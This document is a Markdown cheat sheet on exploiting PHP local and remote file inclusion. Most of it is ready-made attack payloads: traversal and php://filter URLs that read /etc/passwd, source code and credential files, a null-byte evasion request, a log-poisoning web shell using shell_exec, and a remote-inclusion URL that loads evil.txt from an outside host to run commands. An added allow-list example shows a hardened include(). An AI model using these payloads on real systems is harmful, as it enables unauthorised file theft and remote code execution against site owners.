file_inclusion_vulnerabilities.md

File metadata and controls

134 lines (79 loc) · 2.76 KB

File Inclusion Vulnerabilities

  • fimap

  fimap is a Python tool that can be used to automate the exploitation of LFI/RFI vulnerabilities found in PHP applications (the LFI equivalent of sqlmap): https://github.com/kurobeats/fimap

  • Gaining a shell from phpinfo() (fimap + phpinfo() exploit)

  If a phpinfo() file is present, it is usually possible to get a shell. If you don't know the location of the phpinfo file, fimap can probe for it, or you can use a tool like OWASP DirBuster.

  • For Local File Inclusion, look for calls to the include() function in PHP code, for example:

```php
include("lang/".$_COOKIE['lang']);

include($_GET['page'].".php");
```
  • LFI - Encode and decode a file using base64 (the php://filter wrapper returns the file base64-encoded; the long base64 run is then extracted and decoded):

```bash
curl -s \
  "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
  | grep -e '[^ ]\{40,\}' | base64 -d
```
  • LFI - Download a file with base64 encoding:

```
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
```
  • LFI Linux files:

```
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
```
  • LFI Windows files:

```
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
```
  • LFI OSX files:

```
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
```
  • LFI - Download the passwords file:

```
http://$ip/index.php?page=/etc/passwd

http://$ip/index.php?file=../../../../etc/passwd
```
  • LFI - Download the passwords file with filter evasion (URL-encoded slashes):

```
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
  • Local File Inclusion - in versions of PHP below 5.3 the path can be terminated with a null byte (%00), which discards anything the code appends after it:

```
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
```
  • Contaminating log files - the PHP that ends up written into the log and is executed when the log file is included:

```php
<?php echo shell_exec($_GET['cmd']);?>
```
  • For a Remote File Inclusion, look for unsanitized input passed to the PHP include() function; php.ini must also be configured to allow remote files:

  • /etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "On"

```php
include($_REQUEST["file"].".php");
```
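As an added example (not code from the original page), the vulnerable include() pattern from the LFI and RFI bullets above, beside a hardened version that resolves the request parameter through a fixed allow-list; the page names, the pages/ directory and the `file` parameter name are assumptions:

```php
<?php
// Added example, not from the original page: the vulnerable include() pattern
// from the LFI and RFI bullets, next to a hardened form. The page names
// (home/about/contact), the pages/ directory and the 'file' parameter are assumptions.

// Vulnerable: raw request data is concatenated into the include path, so
// "../" traversal, php://filter wrappers and (with allow_url_include=On)
// remote URLs are all interpreted by include().
function include_page_vulnerable(): void
{
    include($_REQUEST['file'] . ".php");
}

// Hardened: the request value is only ever a key into a fixed allow-list.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request is rejected.
function resolve_page(string $requested): ?string
{
    // Exact-match lookup: no path separators, wrappers or encodings are parsed.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // Defence in depth: confirm the resolved file still lives under pages/,
    // so a mistaken allow-list entry cannot point outside that directory.
    $base = realpath(__DIR__ . '/pages');
    $path = ($base === false) ? false : realpath($base . '/' . ALLOWED_PAGES[$requested]);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_page_hardened(): void
{
    $requested = (string) ($_REQUEST['file'] ?? 'home');
    $page = resolve_page($requested);
    if ($page === null) {
        // Log the rejected value: "../", "php://" or "%00" here are the LFI
        // probes described on this page and worth alerting on.
        error_log('file inclusion rejected: ' . $requested);
        http_response_code(404);
        return;
    }
    include $page;
}
```

Keep "allow_url_include" (and, where the application permits, "allow_url_fopen") set to "Off" in php.ini as well: the allow-list protects this code path, while the ini setting removes the remote-include capability from every include() in the application.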

Remote File Inclusion

```
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
```

Contents of evil.txt:

```php
<?php echo shell_exec("ipconfig");?>
```